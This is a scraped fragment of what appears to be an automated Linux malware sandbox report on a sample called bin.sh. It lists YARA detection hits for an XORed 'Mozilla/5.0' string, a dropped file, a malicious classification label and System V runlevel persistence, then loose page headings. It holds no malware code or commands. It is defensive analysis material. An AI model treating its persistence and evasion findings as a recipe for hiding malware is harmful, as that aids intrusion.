Source: bin.sh, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6821.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 6790.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal100.spre.troj.evad.linSH@0/221@4/0

Persistence and Installation Behavior:

Sample tries to persist itself using System V runlevels

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report bin.sh

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Jbx Signature Overview

AV Detection:

Spreading:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Persistence and Installation Behavior: